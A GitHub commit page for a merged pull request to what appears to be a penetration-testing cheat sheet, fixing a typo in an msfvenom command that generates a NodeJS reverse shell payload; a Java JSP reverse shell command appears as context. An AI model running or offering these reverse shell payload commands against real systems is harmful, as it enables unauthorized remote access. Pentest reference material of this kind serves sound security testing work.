Merge pull request #343 from nkd3v/patch-1

Fix NodeJS reverse shell
This commit is contained in:
Carlos Polop 2022-05-27 16:59:42 +01:00 committed by GitHub
commit 2caa59e068
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -157,7 +157,7 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f w
## NodeJS
```bash
sfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```
# **Script Language payloads**